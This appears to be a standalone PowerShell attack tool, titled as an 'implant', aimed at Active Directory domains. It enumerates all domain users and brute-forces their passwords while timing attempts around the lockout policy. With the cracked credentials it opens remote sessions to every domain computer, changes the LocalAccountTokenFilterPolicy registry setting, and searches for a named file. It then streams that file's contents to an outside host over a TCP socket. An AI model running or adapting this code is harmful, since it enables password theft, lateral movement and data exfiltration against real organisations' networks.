$global:global_password = $nullfunction BruteForceUser { param ( [strin

1. $global:global_password = $null
2.  
3. function BruteForceUser {
4.  
5. param ( [string []] $passwords, [string] $username, [int32] $lockoutThreshold, [double] $lockoutObsWindowSeconds, [string] $LogFile, [REF]$global_password)
6.  
7. $attemps = 0
8. $global_password.Value = ""
9.  
10. Write-Output "----------------------------------------------------------------------"
11. Write-Output "[*] Brute Forcing passwords for username: '$username'"
12.  
13. foreach ($password in $passwords) {
14. Write-Output "Trying password $password"
15.  
16. if($attempts -eq $lockoutThreshold) {
17.  
18. Write-Output "Hit threshold limit...sleeping"
19. $lockoutObsWindowSeconds = $lockoutObsWindowSeconds + 3
20. Start-Sleep $lockoutObsWindowSeconds
21. $attempts = 0
22. Write-Output "Reattempting to brute force"
23. }
24.  
25. $dom = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$(([adsi]'').distinguishedName)",$username,$password)
26. $res = $dom.name
27.  
28. if($res -eq $null) {
29. Write-Output "Password '$password' was wrong"
30. $attempts = $attempts + 1
31. }
32.  
33. else {
34. Write-Output "Password '$password' was right!!!"
35.  
36. if($LogFile) {
37. Add-Content $LogFile "$username has this password: $password"
38. }
39.  
40. else {
41. Write-Output "'$username' has this password: '$password'"
42. }
43.  
44. $global_password.Value = $password
45. return 1
46. }
47. }
48.  
49. Write-Output "Not able to brute force password for'$username'"
50. return 0
51. }
52.  
53.  
54. function BeginImpant {
55.  
56. param( [string] $PassList, [string] $FileName, $Target, [string] $LogFile)
57.  
58. Import-Module activedirectory
59.  
60. $domain = (Get-ADDomain -Current LoggedOnUser).distinguishedName
61.  
62. $ip = $Target.split(":")[0]
63. $port = [int] $Target.split(":")[1]
64.  
65. $socket = New-Object Net.Sockets.TcpClient($ip,$port) -ErrorAction Stop
66. $tcpStream = $socket.GetStream()
67. $writer = New-Object System.IO.StreamWriter($tcpStream)
68. $writer.AutoFlush = $true
69.  
70. $userAccounts = Get-ADUser -Filter * -SearchBase $domain | Select-Object -ExpandProperty SamAccountName
71. [string []] $passwordList = Get-Content -Path $PassList
72.  
73. $accountInfo = Get-ADDefaultDomainPasswordPolicy | Select LockoutThreshold, LockoutObservationWindow
74.  
75. $lockoutThreshold = $accountInfo.LockoutThreshold
76. $lockoutObsWindow = $accountInfo.LockoutObservationWindow.TotalSeconds
77.  
78. $successfulAccounts = @()
79.  
80. foreach ($userName in $userAccounts) {
81. Write-Output "[*] Processing username: '$userName'"
82.  
83. BruteForceUser $passwordList $userName $lockoutThreshold $lockoutObsWindow $LogFile ([REF]$global:global_password)
84.  
85. if($global_password -eq "") {Write-Output "Password not found"}
86. else {
87. $res = "" | Select-Object username,password
88. $res.username = $userName
89. $res.password = $global_password
90. $successfulAccounts += $res
91. }
92. }
93.  
94. Write-Host $successfulAccounts
95.  
96. $computers = Get-ADComputer -Filter * | Select -ExpandProperty name
97.  
98. Write-Host $computers
99.  
100. foreach($computer in $computers) {
101.  
102. foreach($userInfo in $successfulAccounts) {
103.  
104. $secstr = New-Object -TypeName System.Security.SecureString
105. $userInfo.password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}
106. $cred = New-Object -typename System.Management.Automation.PSCredential $userInfo.username,$secstr
107. $uname = $userInfo.username
108.  
109. try {
110. $s = New-PSSession -ComputerName $computer -Credential $cred -ErrorAction SilentlyContinue
111.  
112. $checkKeyExists = Invoke-Command -Session $s -Scriptblock {Test-Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy -ErrorAction SilentlyContinue}
113.  
114. if($checkKeyExists -eq $false) {
115. Write-Host "Creating registry key on $computer"
116. Invoke-Command -Session $s -Scriptblock {New-Item -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LocalAccountTokenFilterPolicy -ErrorAction SilentlyContinue -Force}
117. }
118.  
119. Write-Host "Setting value of key to 1 in $computer"
120. Invoke-Command -Session $s -Scriptblock {Set-Item -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy -Value "1" -ErrorAction SilentlyContinue}
121.  
122. $res = Invoke-Command -Session $s -Scriptblock {param($fname) Get-ChildItem -Path C:\ -Recurse -Filter $fname -ErrorAction SilentlyContinue -Force} -ArgumentList $FileName
123.  
124. if ($res -eq $null) {
125. Write-Output "File not found in user $uname in computer $computer"
126. }
127.  
128. else {
129. $filePath = $res.FullName
130. $fileContent = Invoke-Command -Session $s -Scriptblock {param($fpath) [IO.File]::ReadAllText($fpath)} -ArgumentList $filePath
131.  
132. Write-Host "File found...: $fileContent"
133.  
134. Write-Host "Sending file to server"
135. $writer.WriteLine($fileContent)
136. }
137. Remove-PSSession $s
138. }
139.  
140. catch {
141. Write-Output "Some error occured in computer $computer with user $uname"
142. }
143. }
144. }
145. }